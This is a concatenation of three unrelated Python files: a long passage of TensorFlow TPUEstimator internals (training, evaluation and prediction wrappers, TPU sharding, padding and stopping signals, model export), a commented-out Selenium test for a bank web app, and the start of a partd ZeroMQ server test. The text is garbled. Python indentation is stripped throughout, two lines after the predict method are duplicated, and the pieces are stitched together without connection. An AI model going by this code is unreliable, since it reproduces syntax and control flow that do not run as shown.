saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_savedmodel()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if self._log_every_n_steps is not None:
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
output_dir=self.model_dir,
every_n_steps=self._log_every_n_steps)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if self._log_every_n_steps is not None:
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'shutdown_worker')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(timeout_ms=60 * 1000),
]
elif shutdown_mode == 'shutdown_computation':
finalizer_hooks = [
session_support.RestartComputation(timeout_ms=60 * 1000),
]
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
),
InstallSignalHandlerHook()
])
if self._log_every_n_steps is not None:
logging_hook_frequency = ( # Divide and round up
(self._log_every_n_steps +
self._config.tpu_config.iterations_per_loop - 1) //
self._config.tpu_config.iterations_per_loop)
hooks.append(
training.LoggingTensorHook({
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=logging_hook_frequency))
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold, eval_hooks = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects all metrics in `eval_metric_ops` have update_op and calls
# them one by one. The real metric update_ops are invoked in a
# separated thread. So, here give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode]),
] + input_hooks
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(dummy_predict_op, host_calls,
scaffold, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode]),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _is_tpu_tensor(tensor):
if not isinstance(tensor, ops.Tensor):
return False
try:
tensor.op.get_attr(tpu._OUTSIDE_COMPILATION_ATTR) # pylint: disable=protected-access
except ValueError:
return True
else:
return False
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output.outputs.values()
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must be have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold, captured_eval_hooks.get()
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold, captured_training_hooks.get()
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold, captured_predict_hooks.get()
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = self._dataset.make_initializable_iterator()
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if isinstance(params, hparam.HParams):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None,
strip_default_attrs=False):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
strip_default_attrs: Boolean. If `True`, default-valued attributes will be
removed from the NodeDefs.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_savedmodel(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path,
strip_default_attrs)
|
test_selenium.py
|
# class SeleniumTestCase(unittest.TestCase):
# client = None
# app = None
#
# def __init__(cls, app):
# # super(SeleniumTestCase, cls).__init__(**kwargs)
# cls.app = app
#
# @classmethod
# def setUpClass(cls):
#
# try:
# cls.client = webdriver.Safari(port=5001)
# except:
# pass
#
# if cls.client:
# # create program
# cls.app_context = cls.app.app_context()
# cls.app_context.push()
#
# # create db
# db.create_all()
# Bank.generate_fake()
#
# # run bankmake program
# threading.Thread(target=cls.app.run).start()
#
# @classmethod
# def tearDownClass(cls):
# if cls.client:
# cls.client.get("http://127.0.0.1:5000/shutdown")
# cls.client.close()
#
# db.drop_all()
# db.session.remove()
#
# cls.app_context.pop()
#
# def setUp(self):
# if not self.client:
# self.skipTest("Web Browser not available")
#
# def tearDown(self):
# pass
#
# def get_banks(self):
#
# # show bank page
# self.client.get("http://127.0.0.1:5000/")
# self.assertTrue(re.search("zhangziran"), self.client.page_source)
#
# # click add button
# self.client.find_elements_by_id("bankAdd").click()
# self.assertTrue("bankForm", self.client.page_source)
#
# # add banks
# self.client.find_element_by_name("bankName").send_keys("ZHO")
# self.client.find_element_by_name("bankCity").send_keys("Beijing")
# self.client.find_element_by_name("bankAddress").send_keys("XiCheng District")
# self.assertTrue(re.search("true"), self.client.page_source)
|
test_zmq.py
|
import pytest
pytest.importorskip('zmq')
from partd.zmq import Server, keys_to_flush, File, Client
from partd import core, Dict
from threading import Thread
from time import sleep
from contextlib import contextmanager
import pickle
import os
import shutil
def test_server():
s = Server()
try:
s.start()
s.append({'x': b'abc', 'y': b'1234'})
s.append({'x': b'def', 'y': b'5678'})
assert s.get(['x']) == [b'abcdef']
assert s.get(['x', 'y']) == [b'abcdef', b'12345678']
assert s.get(['x']) == [b'abcdef']
